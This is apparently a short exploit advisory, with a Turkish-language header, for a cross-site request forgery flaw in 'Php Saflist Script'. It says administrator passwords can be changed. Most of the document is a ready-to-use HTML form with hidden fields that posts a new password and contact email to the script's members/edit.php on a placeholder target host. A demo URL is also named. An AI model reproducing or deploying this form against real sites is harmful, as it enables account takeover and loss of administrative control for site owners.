< ------------------- header data start ------------------- >

#############################################################

# Application Name : Php Saflist Script

# vulnerable Type : XSRF

# Infection : Administrator sifreleri degistirilebilir.

# author : CWCaspeR

# Demo : http://www.helponhand.com/phpsafelist/members/edit.php

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form method=post action=http://hedefsite.com/script_yolu/members/edit.php>
<input type=hidden name=oglist value=[email protected]>
<input type=hidden name=newpassword size=23 value=Sifreniz maxlength=20>
<input type=hidden name=newcontact size=23 value=mailiniz maxlength=100>
<input type=Hidden name=newlist size=23 value=mailiniz maxlength=100>
<select name=newvacation><option value=1 >1</option></select>
<input type=submit name=action value=BUTONADI>
</form>

< -- bug code end of -- >